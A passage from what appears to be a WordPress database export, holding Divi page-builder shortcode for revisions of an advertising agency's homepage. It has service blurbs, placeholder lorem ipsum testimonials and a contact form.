allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:07:11','2020-08-07 20:07:11','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(587,1,'2020-08-07 20:07:20','2020-08-07 20:07:20','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" 